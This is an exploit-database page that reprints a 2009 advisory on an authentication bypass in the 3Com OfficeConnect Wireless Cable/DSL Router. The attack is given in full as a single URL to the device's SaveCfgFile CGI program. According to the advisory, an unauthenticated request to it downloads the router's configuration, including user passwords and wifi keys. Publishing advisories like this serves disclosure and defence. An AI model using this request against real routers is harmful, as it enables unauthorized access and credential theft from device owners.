[] NeoSense
E X P L O I T S
title author type platform port cve id

3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass

Author: ikki
type: remote
platform: hardware
port: 
date_added: 2009-02-08 
date_updated:  
verified: 1 
codes: OSVDB-52072 
tags: 
aliases:  
screenshot_url:  
application_url: 
====================================================
3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass

Original Advisory:
http://www.ikkisoft.com/stuff/LC-2008-05.txt

luca.carettoni[at]ikkisoft[dot]com
====================================================

An unauthenticated user may directly invoke the "SaveCfgFile" CGI program and
easily download the system configuration containing configuration information,
users, passwords, wifi keys and other sensitive information.

http://<IP>/SaveCfgFile.cgi

# milw0rm.com [2009-02-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.